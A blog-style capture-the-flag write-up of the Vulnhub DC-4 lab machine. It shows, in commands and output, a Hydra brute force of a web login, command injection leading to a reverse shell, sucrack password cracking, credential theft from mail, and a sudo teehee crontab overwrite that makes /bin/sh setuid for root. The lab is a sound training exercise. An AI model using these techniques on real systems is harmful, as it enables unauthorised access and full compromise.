--- title: "Vulnhub: DC-4" pubDatetime: 2019-04-09T18:17:19.000Z tags: ["vulnhub", "writeup"] description: "Writeup of DC-4 from Vulnhub. Another beginner-to-intermediate box from the DC series." --- ## Info **Name**: DC-4 **Operating System**: Linux **Url**: [http://www.five86.com/dc-4.html](http://www.five86.com/dc-4.html) **Release**: 26 Mar 2019 **Difficulty**: Beginner/Intermediate **Description**: DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. ## Enumeration As always, let's start with a nmap scan to see what we're up against. ```bash nmap -sC -sV 192.168.1.146 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-09 18:42 CEST Nmap scan report for 192.168.1.146 Host is up (0.000078s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA) | 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA) |_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519) 80/tcp open http nginx 1.15.10 |_http-server-header: nginx/1.15.10 |_http-title: System Tools MAC Address: 00:0C:29:BF:BD:19 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Going to the web server we see the following: ![](/images/2019/04/main-page.png) After a bit of enumeration with `GoBuster` and `Nikto` I decided to try and bruteforce the login using `Hydra`. ```bash root@kali:~# hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common Credentials/500-worst-passwords.txt 192.168.1.146 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-09 18:47:27 [DATA] max 16 tasks per 1 server, overall 16 tasks, 499 login tries (l:1/p:499), ~32 tries per task [DATA] attacking http-post-form://192.168.1.146:80/login.php:username=^USER^&password=^PASS^:S=logout [80][http-post-form] host: 192.168.1.146 login: admin password: happy [STATUS] attack finished for 192.168.1.146 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-09 18:47:47 ``` This was a bit of trial and error, using different wordlists and success strings. The `S` parameter specifies a string `Hydra` should see if we successfully guess the correct password. When we successfully login to a page, we usually have a way of logging out of the page, hence why we choose the string "_logout_". When we login to the webpage we are presented with a link to _command.php_ - a file I found when enumerating with `GoBuster` earlier. Visiting this page reveals we can use three different commands: `ls -l`, `du -h` and `df -h`. ![](/images/2019/04/commandphp-1.png) Using `Burp Suite` as a proxy we can look at the request we are sending to the web server. ![](/images/2019/04/burp-initial.png) ## Initial Foothold Looking at the request parameters, we definitely have a `command injection` vulnerability here. Using the radio parameter we can probably send our own commands to the server and get a reverse shell! ![](/images/2019/04/rev-shell-burp-suite.png) URL encoding key characters of the radio parameter before forwarding the request and starting a listener on our machine gives us an initial foothold! ```bash root@kali:~# nc -lvnp 1337 listening on [any] 1337 ... connect to [192.168.1.142] from (UNKNOWN) [192.168.1.146] 43420 /bin/sh: 0: can't access tty; job control turned off $ whoami;id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` ## Privilege Escalation Looking at `/home/` we see three users: charles, jim and sam. I didn't find anything of interest in charles and sam's directories. But looking at jim's we find a backup file with all of his old passwords... Well then. ```bash www-data@dc-4:/home/jim/backups$ head old-passwords.bak 000000 12345 iloveyou 1q2w3e4r5t 1234 123456a qwertyuiop monkey 123321 dragon ``` Based on the really, really bad passwords he's using, we can assume he also reuse some of the passwords. We can use `sucrack` to bruteforce the password using the backup file as a password list! We can download `sucrack` here: [http://www.leidecker.info/projects/sucrack.shtml](http://www.leidecker.info/projects/sucrack.shtml) But we can't just compile it using only `./configure` and `make`. Since the machine is running a 32-bit operating system we need to specify we want to compile `sucrack` as a 32-bit executable. ```bash root@kali:/opt/sucrack-1.2.3# ./configure --build=i686-pc-linux-gnu "CFLAGS=-m32" "CXXFLAGS=-m32" "LDFLAGS=-m32" checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for gawk... gawk checking whether make sets $(MAKE)... yes [...] ``` ```bash root@kali:/opt/sucrack-1.2.3# make make all-recursive make[1]: Entering directory '/opt/sucrack-1.2.3' Making all in src make[2]: Entering directory '/opt/sucrack-1.2.3/src' [...] ``` ```bash root@kali:/opt/sucrack-1.2.3# file src/sucrack src/sucrack: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=dbb463e7663597b02985ee82ba42573b3e291afd, not stripped ``` Sweet! Now we can upload `sucrack` to the server and start bruteforcing jim's password. ```bash www-data@dc-4:/dev/shm$ ./sucrack -w 10 -u jim /home/jim/backups/old-passwords.bak password is: jibril04 www-data@dc-4:/dev/shm$ su jim Password: jim@dc-4:/dev/shm$ ``` Awesome! We have now escalated to jim! Once again we look at jim's home directory and we see a file called `mbox`. ```bash jim@dc-4:~$ ls backups mbox test.sh jim@dc-4:~$ cat mbox From root@dc-4 Sat Apr 06 20:20:04 2019 Return-path: Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000 Received: from root by dc-4 with local (Exim 4.89) (envelope-from ) id 1hCiQe-0000gc-EC for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000 To: jim@dc-4 Subject: Test MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: From: root Date: Sat, 06 Apr 2019 20:20:04 +1000 Status: RO This is a test. ``` Seems like we have a mail server running? Let's check `netstat`. **** ```bash jim@dc-4:~$ netstat -tulpn bash: netstat: command not found ``` So, `netstat` is missing. Well, we don't need `netstat` to check if something is listening on the server. We can just ask `/proc/net/tcp` nicely. ```bash jim@dc-4:~$ cat /proc/net/tcp sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14687 1 f62f9740 100 0 0 10 20 1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 13788 1 f62f8040 100 0 0 10 0 2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14640 1 f62f8bc0 100 0 0 10 0 3: 9201A8C0:A99C 8E01A8C0:0539 01 00000000:00000000 00:00000000 00000000 33 0 15248 3 f62f9180 20 4 31 10 -1 ``` Looking at the column for `local_address` we can see that we have three services listening on the server (ignoring the last entry since that's our connection to the server). I won't be decoding the ip addresses, since I know that `0x0100007F` == `127.0.0.1` and `0x00000000` == `0.0.0.0`. We can however convert the ports: ```bash jim@dc-4:~$ cat /proc/net/tcp sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14687 1 f62f9740 100 0 0 10 20 1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 13788 1 f62f8040 100 0 0 10 0 2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 14640 1 f62f8bc0 100 0 0 10 0 3: 9201A8C0:A99C 8E01A8C0:0539 01 00000000:00000000 00:00000000 00000000 33 0 15248 3 f62f9180 20 4 31 10 -1 jim@dc-4:~$ echo $((16#0019)) 25 jim@dc-4:~$ echo $((16#0050)) 80 jim@dc-4:~$ echo $((16#0016)) 22 ``` So, we have the following ports open: - 127.0.0.1:25 - 0.0.0.0:80 - 0.0.0.0:22 **** Puh, anyway, going on with the privesc we check `/var/mail/jim`. ```bash jim@dc-4:~$ cat /var/mail/jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local (Exim 4.89) (envelope-from ) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000 To: jim@dc-4 Subject: Holidays MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: From: Charles Date: Sat, 06 Apr 2019 21:15:45 +1000 Status: O Hi Jim, I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya, Charles ``` Sweet! We just got charles' password! Let's escalate once again! ```bash jim@dc-4:~$ su charles Password: charles@dc-4:/home/jim$ whoami;id charles uid=1001(charles) gid=1001(charles) groups=1001(charles) ``` Poking around we find out that we can use sudo. ```bash charles@dc-4:/home/jim$ sudo -l Matching Defaults entries for charles on dc-4: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User charles may run the following commands on dc-4: (root) NOPASSWD: /usr/bin/teehee ``` So, what is the program `teehee`? ```bash charles@dc-4:/home/jim$ teehee --help Usage: teehee [OPTION]... [FILE]... Copy standard input to each FILE, and also to standard output. [...] ``` Okay, so `teehee` copies standard input to a file of our choosing? We should be able to get a root shell quite easily then. What if we use `teehee` and overwrite `/etc/crontab` making `/bin/sh` a setuid binary? If `/bin/sh` is symlinked to `/bin/bash` this won't work though, since `bash` automatically droppes setuid privileges. You know, for security reasons... But checking the symlink we see that `/bin/sh` is symlinked to `dash`. Dash does not drop setuid privileges so we can exploit this to get a root shell! ```bash charles@dc-4:/home/jim$ ls -la /bin/sh lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash ``` Now we can overwrite `/etc/crontab`, make `dash` a setuid binary and finally get a root shell. ```bash charles@dc-4:/home/jim$ sudo teehee /etc/crontab * * * * * root chmod 4777 /bin/sh * * * * * root chmod 4777 /bin/sh ^C charles@dc-4:/home/jim$ ls -la /bin/dash -rwsrwxrwx 1 root root 124492 Jan 24 2017 /bin/dash charles@dc-4:/home/jim$ /bin/sh # whoami;id root uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles) ``` And finally we can cat the flag! ```bash # cat flag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7. ``` [Thumbsup Computer GIF](https://tenor.com/view/thumbsup-computer-kid-gif-4533805) from [Thumbsup GIFs](https://tenor.com/search/thumbsup-gifs) ## Further Reading [https://labs.portcullis.co.uk/tools/sucrack/](https://labs.portcullis.co.uk/tools/sucrack/) [https://unix.stackexchange.com/questions/74527/setuid-bit-seems-to-have-no-effect-on-bash](https://unix.stackexchange.com/questions/74527/setuid-bit-seems-to-have-no-effect-on-bash) [https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof](https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof) [http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html](http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html)